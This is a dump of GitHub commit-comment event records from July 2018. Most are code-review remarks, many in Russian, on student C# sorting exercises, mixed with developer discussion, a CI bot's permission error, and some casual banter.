{"id":"7902677194","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29557097,"position":51,"line":76,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-01T08:40:37Z","updated_at":"2018-07-01T08:40:37Z","author_association":"NONE","body":" ref - аналогично"}},"created_at":"2018-07-01T08:40:37Z"}
{"id":"7902678023","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29557100,"position":128,"line":173,"path":"NET.S.2018.Lyubchenko.01/ArraySorts/ArraySorts.cs","commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-01T08:41:21Z","updated_at":"2018-07-01T08:41:21Z","author_association":"NONE","body":"Сообщение должно быть более информационным читаемым"}},"created_at":"2018-07-01T08:41:21Z"}
{"id":"7902678623","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"akimlyubchenko/Training-Summer-Express-2018"},"payload":{"comment":{"id":29557102,"position":null,"line":null,"path":null,"commit_id":"789124b094ea21df715456f26f9f8e1281fb7479","created_at":"2018-07-01T08:41:53Z","updated_at":"2018-07-01T08:41:53Z","author_association":"NONE","body":"Не комитить лишние файлы!"}},"created_at":"2018-07-01T08:41:53Z"}
{"id":"7902680089","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"Yasir-siddiqui/Joker_dabot"},"payload":{"comment":{"id":29557106,"position":6,"line":91,"path":"tg_bot/modules/welcome.py","commit_id":"457b9302a778bde03148c0f0894fcacc020331b2","created_at":"2018-07-01T08:43:13Z","updated_at":"2018-07-01T08:43:13Z","author_association":"NONE","body":"LMAO "}},"created_at":"2018-07-01T08:43:13Z"}
{"id":"7902680336","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Nekliukov/NET.S.2018.Nekliukov"},"payload":{"comment":{"id":29557107,"position":24,"line":17,"path":"NET.S.2018.Nekliukov.01/Algorithms/ArrayIntExtension.cs","commit_id":"122338165720a39dcfde45a6f124cc1f5f099927","created_at":"2018-07-01T08:43:27Z","updated_at":"2018-07-01T08:43:27Z","author_association":"NONE","body":"Должен возвращать void!"}},"created_at":"2018-07-01T08:43:27Z"}
{"id":"7902680533","type":"CommitCommentEvent","actor":{"login":"shivendra14"},"repo":{"name":"google/flatbuffers"},"payload":{"comment":{"id":29557108,"position":null,"line":null,"path":null,"commit_id":"a2fe49b498955bc70c0cafc037a2ccd8b1b843d0","created_at":"2018-07-01T08:43:37Z","updated_at":"2018-07-01T08:43:37Z","author_association":"CONTRIBUTOR","body":"@aardappel : there is no error now, but the documentation is still not added in generated header!"}},"created_at":"2018-07-01T08:43:37Z"}
{"id":"7902680549","type":"CommitCommentEvent","actor":{"login":"redking12"},"repo":{"name":"Yasir-siddiqui/Joker_dabot"},"payload":{"comment":{"id":29557109,"position":6,"line":91,"path":"tg_bot/modules/welcome.py","commit_id":"457b9302a778bde03148c0f0894fcacc020331b2","created_at":"2018-07-01T08:43:38Z","updated_at":"2018-07-01T08:43:38Z","author_association":"NONE","body":"@lzzy12 pro thug welcome msgs"}},"created_at":"2018-07-01T08:43:38Z"}
{"id":"7902680872","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Nekliukov/NET.S.2018.Nekliukov"},"payload":{"comment":{"id":29557110,"position":27,"line":20,"path":"NET.S.2018.Nekliukov.01/Algorithms/ArrayIntExtension.cs","commit_id":"122338165720a39dcfde45a6f124cc1f5f099927","created_at":"2018-07-01T08:43:55Z","updated_at":"2018-07-01T08:43:55Z","author_association":"NONE","body":"Сообщения долее читаемым, не достаточно nameof(arr)"}},"created_at":"2018-07-01T08:43:55Z"}
{"id":"7902681948","type":"CommitCommentEvent","actor":{"login":"fholger"},"repo":{"name":"duzenko/darkmod-experiments"},"payload":{"comment":{"id":29557111,"position":44,"line":613,"path":"renderer/tr_subview.cpp","commit_id":"4726d715b5fece44f5467001625e0f42f9da3bb4","created_at":"2018-07-01T08:44:55Z","updated_at":"2018-07-01T08:44:55Z","author_association":"NONE","body":"What do you mean, exactly? Here, m_Lightgem_rv has been turned into a local reference, so public or private doesn't really apply anymore.\r\n\r\nIn general, having member variables declared public is not exactly best practice. But in the context of the Doom3/TDM engine code, I'd say it's an acceptable shortcut in many places."}},"created_at":"2018-07-01T08:44:55Z"}
{"id":"7902682487","type":"CommitCommentEvent","actor":{"login":"Frankkz"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557115,"position":null,"line":null,"path":null,"commit_id":"7172476e3b27a465a429122c5cd3a3d3fb51706f","created_at":"2018-07-01T08:45:22Z","updated_at":"2018-07-01T08:45:22Z","author_association":"NONE","body":"@EthanCentaurai yea just wanted to let xPaw know that the instruction the script gives(to simply copy the /gettoken page) may not work for everyone"}},"created_at":"2018-07-01T08:45:22Z"}
{"id":"7902682772","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Nekliukov/NET.S.2018.Nekliukov"},"payload":{"comment":{"id":29557116,"position":89,"line":80,"path":"NET.S.2018.Nekliukov.01/Algorithms/ArrayIntExtension.cs","commit_id":"122338165720a39dcfde45a6f124cc1f5f099927","created_at":"2018-07-01T08:45:39Z","updated_at":"2018-07-01T08:45:39Z","author_association":"NONE","body":"List заменить на массив"}},"created_at":"2018-07-01T08:45:39Z"}
{"id":"7902682889","type":"CommitCommentEvent","actor":{"login":"martinvw"},"repo":{"name":"wborn/smarthome"},"payload":{"comment":{"id":29557117,"position":7,"line":165,"path":"bundles/io/org.eclipse.smarthome.io.net.test/org.eclipse.smarthome.io.net.test.launch","commit_id":"b3e6d642ad07fcaaa56b03222ddcfbd79ad3f37b","created_at":"2018-07-01T08:45:46Z","updated_at":"2018-07-01T08:45:46Z","author_association":"NONE","body":"It helps if I run it as `JUnit Plug-in Test` 🥇  😞 "}},"created_at":"2018-07-01T08:45:46Z"}
{"id":"7902683783","type":"CommitCommentEvent","actor":{"login":"EthanCentaurai"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557118,"position":null,"line":null,"path":null,"commit_id":"7172476e3b27a465a429122c5cd3a3d3fb51706f","created_at":"2018-07-01T08:46:34Z","updated_at":"2018-07-01T08:46:34Z","author_association":"CONTRIBUTOR","body":"Fair enough. :P"}},"created_at":"2018-07-01T08:46:34Z"}
{"id":"7902684521","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Nekliukov/NET.S.2018.Nekliukov"},"payload":{"comment":{"id":29557123,"position":137,"line":119,"path":"NET.S.2018.Nekliukov.01/Algorithms/ArrayIntExtension.cs","commit_id":"122338165720a39dcfde45a6f124cc1f5f099927","created_at":"2018-07-01T08:47:18Z","updated_at":"2018-07-01T08:47:18Z","author_association":"NONE","body":"функция Swap?"}},"created_at":"2018-07-01T08:47:18Z"}
{"id":"7902684861","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Nekliukov/NET.S.2018.Nekliukov"},"payload":{"comment":{"id":29557124,"position":null,"line":null,"path":null,"commit_id":"122338165720a39dcfde45a6f124cc1f5f099927","created_at":"2018-07-01T08:47:40Z","updated_at":"2018-07-01T08:47:40Z","author_association":"NONE","body":"Комит не нужных файлов убрать!"}},"created_at":"2018-07-01T08:47:40Z"}
{"id":"7902685418","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29557125,"position":null,"line":null,"path":null,"commit_id":"89767bb5099d99decf0dd1e4a71f7a25781ba598","created_at":"2018-07-01T08:48:10Z","updated_at":"2018-07-01T08:48:10Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n{\n  \"AnyOf\": \\[\n    {\n      \"AnyOf\": \\[\n        \"queue:create\\-task:highest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:very\\-high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:medium:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:very\\-low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:lowest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\"\n      \\]\n    },\n    {\n      \"AnyOf\": \\[\n        \"queue:create\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        {\n          \"AllOf\": \\[\n            \"queue:define\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n            \"queue:task\\-group\\-id:taskcluster\\-github/cPnxSrvHTyOrDfd7FOIQ9A\",\n            \"queue:schedule\\-task:taskcluster\\-github/cPnxSrvHTyOrDfd7FOIQ9A/cPnxSrvHTyOrDfd7FOIQ9A\"\n          \\]\n        }\n      \\]\n    }\n  \\]\n}\n\nYou have the scopes:\n\n```\n\\[\n  \"assume:project:taskcluster:mozilla\\-github\\-repository\",\n  \"assume:repo:github.com/servo/servo:pull\\-request\",\n  \"notify:email:\\*\",\n  \"notify:irc\\-channel:\\*\",\n  \"notify:irc\\-user:\\*\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/github\\-worker\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/github\\-worker\\-windows\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/servo\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/win2012r2\",\n  \"queue:route:garbage.\\*\",\n  \"queue:route:index.garbage.\\*\",\n  \"queue:route:notify.email.\\*\",\n  \"queue:route:notify.irc\\-channel.\\*\",\n  \"queue:route:notify.irc\\-user.\\*\",\n  \"queue:scheduler\\-id:taskcluster\\-github\",\n  \"secrets:get:garbage/\\*\",\n  \"secrets:set:garbage/\\*\"\n\\]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": \\[\n    {\n      \"AnyOf\": \\[\n        {\n          \"AllOf\": \\[\n            \"queue:scheduler\\-id:taskcluster\\-github\",\n            {\n              \"AnyOf\": \\[\n                \"queue:create\\-task:highest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:very\\-high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:medium:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:very\\-low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:lowest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\"\n              \\]\n            }\n          \\]\n        },\n        {\n          \"AnyOf\": \\[\n            \"queue:create\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n            {\n              \"AllOf\": \\[\n                \"queue:define\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:task\\-group\\-id:taskcluster\\-github/cPnxSrvHTyOrDfd7FOIQ9A\",\n                \"queue:schedule\\-task:taskcluster\\-github/cPnxSrvHTyOrDfd7FOIQ9A/cPnxSrvHTyOrDfd7FOIQ9A\"\n              \\]\n            }\n          \\]\n        }\n      \\]\n    }\n  \\]\n}\n```\n----\nmethod:     createTask\nerrorCode:  InsufficientScopes\nstatusCode: 403\ntime:       2018-07-01T08:48:10.760Z\n\n</details>"}},"created_at":"2018-07-01T08:48:10Z"}
{"id":"7902686608","type":"CommitCommentEvent","actor":{"login":"orionmerlin"},"repo":{"name":"web-scrobbler/web-scrobbler"},"payload":{"comment":{"id":29557126,"position":null,"line":null,"path":null,"commit_id":"98f23ac85a5ac60e1a468812b4c6bb45c521e0f9","created_at":"2018-07-01T08:49:09Z","updated_at":"2018-07-01T08:49:09Z","author_association":"NONE","body":"Oh, I'm dumb, I'm sorry. I'm not very familiar with the Github system so I\nthought when the issue was marked closed it meant it should be fixed\nimmediately. Sorry again.\n\nOn Sun, Jul 1, 2018 at 12:45 AM, Alexey <notifications@github.com> wrote:\n\n> It's because I haven't uploaded the fixed version yet.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/web-scrobbler/web-scrobbler/commit/98f23ac85a5ac60e1a468812b4c6bb45c521e0f9#commitcomment-29556920>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AfpqrhjVku3GuZiQ9FG0UBhp5rV_Hgc6ks5uCH43gaJpZM4U-PCe>\n> .\n>\n"}},"created_at":"2018-07-01T08:49:09Z"}
{"id":"7902688111","type":"CommitCommentEvent","actor":{"login":"murthyt8"},"repo":{"name":"murthyt8/ansible-test"},"payload":{"comment":{"id":29557128,"position":null,"line":null,"path":null,"commit_id":"4bf4df2bc167a71f415fdd5b55d3a4bbeee7b361","created_at":"2018-07-01T08:50:29Z","updated_at":"2018-07-01T08:50:29Z","author_association":"OWNER","body":"mmmm"}},"created_at":"2018-07-01T08:50:29Z"}
{"id":"7902689864","type":"CommitCommentEvent","actor":{"login":"wborn"},"repo":{"name":"wborn/smarthome"},"payload":{"comment":{"id":29557133,"position":7,"line":165,"path":"bundles/io/org.eclipse.smarthome.io.net.test/org.eclipse.smarthome.io.net.test.launch","commit_id":"b3e6d642ad07fcaaa56b03222ddcfbd79ad3f37b","created_at":"2018-07-01T08:52:03Z","updated_at":"2018-07-01T08:52:03Z","author_association":"OWNER","body":"Yes it certainly does. :innocent: All this non-trivialness doesn't make it easy for people to add unit tests. :cry: "}},"created_at":"2018-07-01T08:52:03Z"}
{"id":"7902691695","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"stashinskii/NET.S.2018.Stashynski.01"},"payload":{"comment":{"id":29557134,"position":null,"line":null,"path":null,"commit_id":"26f7dab12f46371f618fee64c16bd7cfc8e74c00","created_at":"2018-07-01T08:53:46Z","updated_at":"2018-07-01T08:53:46Z","author_association":"NONE","body":"- if (startIndex == endIndex)\r\n             {\r\n                 return;\r\n             }\r\nэто очень странная проверка, а что будет, если меньше или больше?\r\n- не хватает XML документирования исключений"}},"created_at":"2018-07-01T08:53:46Z"}
{"id":"7902692275","type":"CommitCommentEvent","actor":{"login":"Guria"},"repo":{"name":"umputun/remark"},"payload":{"comment":{"id":29557135,"position":3,"line":3,"path":"web/app/common/polyfills.js","commit_id":"ed92a0bda5cc7922cdc0bcd552452a842c224d87","created_at":"2018-07-01T08:54:19Z","updated_at":"2018-07-01T08:54:19Z","author_association":"CONTRIBUTOR","body":"@igoradamenko Isn't es6-promise already includes finally polyfill?"}},"created_at":"2018-07-01T08:54:19Z"}
{"id":"7902695076","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"stashinskii/NET.S.2018.Stashynski.01"},"payload":{"comment":{"id":29557140,"position":97,"line":125,"path":"SortAlgos.MSTests/SortingAlrogithmsTests.cs","commit_id":"26f7dab12f46371f618fee64c16bd7cfc8e74c00","created_at":"2018-07-01T08:56:51Z","updated_at":"2018-07-01T08:56:51Z","author_association":"NONE","body":"ниже странно, чтобы отсортировать массив, он сгонятется в List, чтобы потом опять согнать в массив? а у массива такой функциональности нет?"}},"created_at":"2018-07-01T08:56:51Z"}
{"id":"7902696671","type":"CommitCommentEvent","actor":{"login":"nielsmh"},"repo":{"name":"OpenTTD/OpenTTD"},"payload":{"comment":{"id":29557144,"position":null,"line":null,"path":null,"commit_id":"0c37b0445adb8dd6f3acda1bea89b170b16bdc06","created_at":"2018-07-01T08:58:22Z","updated_at":"2018-07-01T08:58:22Z","author_association":"CONTRIBUTOR","body":"How about simply the savegame version?"}},"created_at":"2018-07-01T08:58:22Z"}
{"id":"7902697368","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IvanTrashchenko/NET.S.2018.Trashchenko.01"},"payload":{"comment":{"id":29557148,"position":23,"line":66,"path":"ArrayIntegerExtensions/ArrayIntegerExtension.cs","commit_id":"6ee10c425ac088c4a5274305f1a5ec124edf68f4","created_at":"2018-07-01T08:59:02Z","updated_at":"2018-07-01T08:59:02Z","author_association":"NONE","body":"Сообщение для исключения должно быть более читаемым, не достаточно nameof(array)"}},"created_at":"2018-07-01T08:59:02Z"}
{"id":"7902699088","type":"CommitCommentEvent","actor":{"login":"leilei-"},"repo":{"name":"OrdinaryMagician/blender-ue1export"},"payload":{"comment":{"id":29557158,"position":10,"line":42,"path":"FORMAT.md","commit_id":"9f0a0f88aa283836403eb8867a04ba902af7ec1d","created_at":"2018-07-01T09:00:27Z","updated_at":"2018-07-01T09:00:27Z","author_association":"NONE","body":"In the initial release it'd subdivide parts of a model if CurvedSurfaces is true.  Dunno which version regressed it all though (or if the models thesmelves get this flag removed or whatever)\r\n![curvedsrv](https://user-images.githubusercontent.com/6590431/42132729-31233fb6-7d0d-11e8-9d88-7462787ee8d8.jpg)\r\n"}},"created_at":"2018-07-01T09:00:27Z"}
{"id":"7902699777","type":"CommitCommentEvent","actor":{"login":"Darcman99"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29557159,"position":3,"line":2,"path":"data/ship.txt","commit_id":"476aa4a5cee807e207a1b412ae7b8ad004f7e13a","created_at":"2018-07-01T09:01:02Z","updated_at":"2018-07-01T09:01:02Z","author_association":"OWNER","body":"Right, I knew that."}},"created_at":"2018-07-01T09:01:02Z"}
{"id":"7902700445","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29557160,"position":null,"line":null,"path":null,"commit_id":"61543029d126a06310a95d7b866cd054a5838f20","created_at":"2018-07-01T09:01:32Z","updated_at":"2018-07-01T09:01:32Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-212](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-212).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-212-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-01T09:01:32Z"}
{"id":"7902701877","type":"CommitCommentEvent","actor":{"login":"tknopp"},"repo":{"name":"tknopp/NFFT.jl"},"payload":{"comment":{"id":29557162,"position":2,"line":1,"path":"REQUIRE","commit_id":"fa2839d473933508f406f8519a5ca60e163b6766","created_at":"2018-07-01T09:02:42Z","updated_at":"2018-07-01T09:02:42Z","author_association":"OWNER","body":"@Keno: I see. But what means `probably`? Isn't there a canonical solution that should be advised to all upgraders?"}},"created_at":"2018-07-01T09:02:42Z"}
{"id":"7902702057","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.01"},"payload":{"comment":{"id":29557163,"position":25,"line":25,"path":"SortingAlgorithms/Algorithms.cs","commit_id":"bfee9e84cf2ea0098ad5a970bdc5deafeb430e02","created_at":"2018-07-01T09:02:51Z","updated_at":"2018-07-01T09:02:51Z","author_association":"NONE","body":"Параметры по умолчанию существуют не для того, чтобы нас запутать, а чтобы \"сэкономить\" при вызове, мне кажутся странными -1"}},"created_at":"2018-07-01T09:02:51Z"}
{"id":"7902704254","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.01"},"payload":{"comment":{"id":29557169,"position":49,"line":49,"path":"SortingAlgorithms/Algorithms.cs","commit_id":"bfee9e84cf2ea0098ad5a970bdc5deafeb430e02","created_at":"2018-07-01T09:04:35Z","updated_at":"2018-07-01T09:04:35Z","author_association":"NONE","body":"- recursive зачем?"}},"created_at":"2018-07-01T09:04:35Z"}
{"id":"7902705114","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.01"},"payload":{"comment":{"id":29557171,"position":27,"line":27,"path":"SortingAlgorithms/Algorithms.cs","commit_id":"bfee9e84cf2ea0098ad5a970bdc5deafeb430e02","created_at":"2018-07-01T09:05:17Z","updated_at":"2018-07-01T09:05:17Z","author_association":"NONE","body":"Валидация данных не должна отвечать на вопрос да или нет, при неверных данных должны бросаться исключения"}},"created_at":"2018-07-01T09:05:17Z"}
{"id":"7902706110","type":"CommitCommentEvent","actor":{"login":"albz"},"repo":{"name":"ALaDyn/ALaDyn"},"payload":{"comment":{"id":29557173,"position":null,"line":null,"path":null,"commit_id":"57f50b92f7c196abddd09896c05874a98fd08e8c","created_at":"2018-07-01T09:06:09Z","updated_at":"2018-07-01T09:06:09Z","author_association":"CONTRIBUTOR","body":"Can I be extremely critic and mean?! \r\nQuesto commento é molto da informatico piuttosto che da fisico.\r\nPer gli output non sarebbe più comodo definire un file con i 3 formati usati ed usare direttamente quelli? In questo modo l'output é piú pulito e anche più comodo. Poi metterei fin da subito la doppia colonna, cosicché i dati siano stampabili senza dover ricostruire la coordinata longitudinale."}},"created_at":"2018-07-01T09:06:09Z"}
{"id":"7902706189","type":"CommitCommentEvent","actor":{"login":"anna-shumylo"},"repo":{"name":"stefanstrueder/CSS-project"},"payload":{"comment":{"id":29557174,"position":17,"line":17,"path":"sentiment.py","commit_id":"78eb719bd9c9932dc5aeb9e4a4da32687f21db6f","created_at":"2018-07-01T09:06:12Z","updated_at":"2018-07-01T09:06:12Z","author_association":"COLLABORATOR","body":"Maybe it's better to collect also objectivity/subjectivity value using \"post.sentiment.subjectivity\", or just return \"post.sentiment\" to get then polarity and subjectivity an collect them to separate fields of .csv file? This values will show how much our results are representative, I think."}},"created_at":"2018-07-01T09:06:12Z"}
{"id":"7902706251","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.01"},"payload":{"comment":{"id":29557175,"position":65,"line":65,"path":"SortingAlgorithms/Algorithms.cs","commit_id":"bfee9e84cf2ea0098ad5a970bdc5deafeb430e02","created_at":"2018-07-01T09:06:16Z","updated_at":"2018-07-01T09:06:16Z","author_association":"NONE","body":"?????"}},"created_at":"2018-07-01T09:06:16Z"}
{"id":"7902706690","type":"CommitCommentEvent","actor":{"login":"MaxArt1405"},"repo":{"name":"MaxArt1405/ASP.NET-Training"},"payload":{"comment":{"id":29557176,"position":null,"line":null,"path":null,"commit_id":"153fda2dd02cfbdac1635d6bdafffc339fbbe67c","created_at":"2018-07-01T09:06:40Z","updated_at":"2018-07-01T09:06:40Z","author_association":"OWNER","body":"Получается надо в сортировках надо добавить описание на exception, вернуть\r\nмассив если длина 1, и exception если 0\r\nВ задании 2 про filter изменить название класса, так?\r\n\r\n1 июля 2018 г., 11:29 пользователь Anzhelika Kravchuk <\r\nnotifications@github.com> написал:\r\n\r\n> В целом все выглядит очень хорошо, только переименуйте файл, содержащий\r\n> тестовый класс (UnitTest1 - это плохо )\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/MaxArt1405/ASP.NET-Training/commit/153fda2dd02cfbdac1635d6bdafffc339fbbe67c#commitcomment-29557050>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AZXjjsimosciVSEsfhc5V-4wXPXHLqFFks5uCIhagaJpZM4U-Ptj>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-01T09:06:40Z"}
{"id":"7902706899","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.01"},"payload":{"comment":{"id":29557177,"position":null,"line":null,"path":null,"commit_id":"bfee9e84cf2ea0098ad5a970bdc5deafeb430e02","created_at":"2018-07-01T09:06:52Z","updated_at":"2018-07-01T09:06:52Z","author_association":"NONE","body":"Файл сольюшена комитить не нужно"}},"created_at":"2018-07-01T09:06:52Z"}
{"id":"7902707868","type":"CommitCommentEvent","actor":{"login":"fn-xiaobo"},"repo":{"name":"fn-xiaobo/FN_Camera2"},"payload":{"comment":{"id":29557178,"position":null,"line":null,"path":null,"commit_id":"8008c2e6786b7b829ce6b87f73f9892f0d2587da","created_at":"2018-07-01T09:07:44Z","updated_at":"2018-07-01T09:07:44Z","author_association":"OWNER","body":"aa"}},"created_at":"2018-07-01T09:07:44Z"}
{"id":"7902708309","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.01"},"payload":{"comment":{"id":29557179,"position":73,"line":73,"path":"SortingAlgorithms.Tests/AlgorithmsTests.cs","commit_id":"bfee9e84cf2ea0098ad5a970bdc5deafeb430e02","created_at":"2018-07-01T09:08:08Z","updated_at":"2018-07-01T09:08:08Z","author_association":"NONE","body":"Эта логика достойно вынесения в отдельный приватный булевский не тестовый метод"}},"created_at":"2018-07-01T09:08:08Z"}
{"id":"7902708541","type":"CommitCommentEvent","actor":{"login":"WarrenLobo"},"repo":{"name":"Yasir-siddiqui/Joker_dabot"},"payload":{"comment":{"id":29557180,"position":6,"line":91,"path":"tg_bot/modules/welcome.py","commit_id":"457b9302a778bde03148c0f0894fcacc020331b2","created_at":"2018-07-01T09:08:19Z","updated_at":"2018-07-01T09:08:19Z","author_association":"COLLABORATOR","body":"Your mom gay xD\r\n"}},"created_at":"2018-07-01T09:08:19Z"}
{"id":"7902709968","type":"CommitCommentEvent","actor":{"login":"sthalik"},"repo":{"name":"opentrack/opentrack"},"payload":{"comment":{"id":29557187,"position":null,"line":null,"path":null,"commit_id":"d6ca17243063dc33381609fa5767aa4f323f1048","created_at":"2018-07-01T09:09:39Z","updated_at":"2018-07-01T09:09:39Z","author_association":"MEMBER","body":"@cpuwolf I sent you a reply with the following headers:\r\n\r\n```\r\nSubject: Re: Fwd: [...]\r\nDate: Fri, 29 Jun 2018 13:35:12 +0200\r\nMessage-ID: <17744232-2211-7a95-fc99-66a753003a24@misaki.pl>\r\n```\r\n\r\nCan you check your spam folder please? Unless that was a reply to that message in which case we'd know it's a problem on my end immediately.\r\n"}},"created_at":"2018-07-01T09:09:39Z"}
{"id":"7902710597","type":"CommitCommentEvent","actor":{"login":"mivina"},"repo":{"name":"mivina/smachna"},"payload":{"comment":{"id":29557188,"position":3,"line":3,"path":"mivinka.txt","commit_id":"613fc59ab093c28e42493c535c3c58b6ac3d895c","created_at":"2018-07-01T09:10:10Z","updated_at":"2018-07-01T09:10:10Z","author_association":"OWNER","body":"hjgjhhgbjm\r\n"}},"created_at":"2018-07-01T09:10:10Z"}
{"id":"7902711068","type":"CommitCommentEvent","actor":{"login":"iParody"},"repo":{"name":"JohnnyJTGYT/discordbotwebhook"},"payload":{"comment":{"id":29557189,"position":null,"line":null,"path":null,"commit_id":"6b699e8108b5058ae9daa9be71754abd97fde651","created_at":"2018-07-01T09:10:32Z","updated_at":"2018-07-01T09:10:32Z","author_association":"NONE","body":"wtf is this shit?"}},"created_at":"2018-07-01T09:10:32Z"}
{"id":"7902711157","type":"CommitCommentEvent","actor":{"login":"Kaixhin"},"repo":{"name":"Kaixhin/ACER"},"payload":{"comment":{"id":29557190,"position":null,"line":null,"path":null,"commit_id":"4326295297ad7c4c7accf6ffaae707432d4c6f0e","created_at":"2018-07-01T09:10:36Z","updated_at":"2018-07-01T09:10:36Z","author_association":"OWNER","body":"> Have you generated new results?\r\n\r\nHere's one default run (no trust region):\r\n![newplot](https://user-images.githubusercontent.com/991891/42132745-dd11a95e-7d15-11e8-9c30-10ae9df28609.png)\r\n\r\nHere's a run with the trust region:\r\n![newplot 1](https://user-images.githubusercontent.com/991891/42132746-e6f0a5ba-7d15-11e8-8b24-53aa36c28745.png)\r\n\r\nHere's a run where I removed the negative in front of the trust region (to address your doubts in #11):\r\n![newplot 2](https://user-images.githubusercontent.com/991891/42132755-fd47ae8a-7d15-11e8-8b2d-f36d1da667bb.png)\r\n\r\nIt doesn't take too long to generate results on CartPole to check these things, but unfortunately there's a lot of variance.\r\n\r\n> There have been many changes to the repository.\r\n\r\nIn terms of other changes I've made since your first PR, 728c5a2 closed the issue you raised (#9), 4f88628 fixed an error with pickling results, and 1844426 changes the .gitignore to ignore the results directory."}},"created_at":"2018-07-01T09:10:36Z"}
{"id":"7902713135","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IvanShaveko/Training-Summer-2018"},"payload":{"comment":{"id":29557194,"position":26,"line":46,"path":"NET.S.2018.Shaveko.01/ArrayExtension.Test/ArrayExtensionTests.cs","commit_id":"ee74b12353ad6a7c9e8d7f559a2e0f49c3e02d5d","created_at":"2018-07-01T09:12:13Z","updated_at":"2018-07-01T09:12:13Z","author_association":"NONE","body":"Приватные методы на \"дно класса\""}},"created_at":"2018-07-01T09:12:13Z"}
